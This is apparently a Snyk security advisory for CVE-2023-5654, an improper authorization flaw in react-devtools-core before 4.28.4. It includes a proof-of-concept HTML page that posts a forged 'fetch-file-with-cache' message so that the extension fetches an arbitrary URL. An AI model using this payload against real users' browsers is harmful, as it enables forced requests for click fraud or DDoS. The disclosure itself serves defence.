Improper Authorization Affecting react-devtools-core package, versions <4.28.4


Severity

Recommended
0.0
medium
0
10

CVSS assessment made by Snyk's Security Team. Learn more

Threat Intelligence

Exploit Maturity
Proof of concept
EPSS
0.07% (33rd percentile)

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications
  • Snyk IDSNYK-JS-REACTDEVTOOLSCORE-6023999
  • published22 Oct 2023
  • disclosed19 Oct 2023
  • creditCalum Hutton - Snyk Research Team

Introduced: 19 Oct 2023

CVE-2023-5654  (opens in a new tab)
CWE-285  (opens in a new tab)

How to fix?

Upgrade react-devtools-core to version 4.28.4 or higher.

Overview

react-devtools-core is an Use react-devtools outside of the browser

Affected versions of this package are vulnerable to Improper Authorization through the window.addEventListener('message', <listener>) function. By exploiting this vulnerability, an attacker can generate clicks and revenue or initiate a Distributed Denial of Service (DDoS) attack without the victims’ knowledge or consent by sending a message that triggers a fetch request to an arbitrary

PoC


<!DOCTYPE html>
<html>
<head>
  <script src="https://unpkg.com/react@18/umd/react.development.js" crossorigin></script>
  <script src="https://unpkg.com/react-dom@18/umd/react-dom.development.js" crossorigin></script>
  <script src="https://unpkg.com/@babel/standalone/babel.min.js"></script>
</head>
<body>

<div id="mydiv"></div>

<script type="text/babel">
  function Hello() {
    return <h1>Hello World!</h1>;
  }

  const container = document.getElementById('mydiv');
  const root = ReactDOM.createRoot(container);
  root.render(<Hello />)
</script>

<script>
  function sendBrowserMsg() {
    let msg = {
      source: 'react-devtools-extension',
      payload: {
        type: 'fetch-file-with-cache',
        url: 'https://www.google.com'
      }
    }
    console.log(`Sending msg from browser: ${JSON.stringify(msg)}`);
    postMessage(msg, "*");
  }
</script>

<form>
  <button type="button" id="submit" onClick="sendBrowserMsg()">Go!</button>
</form>

</body>
</html>

CVSS Scores

version 3.1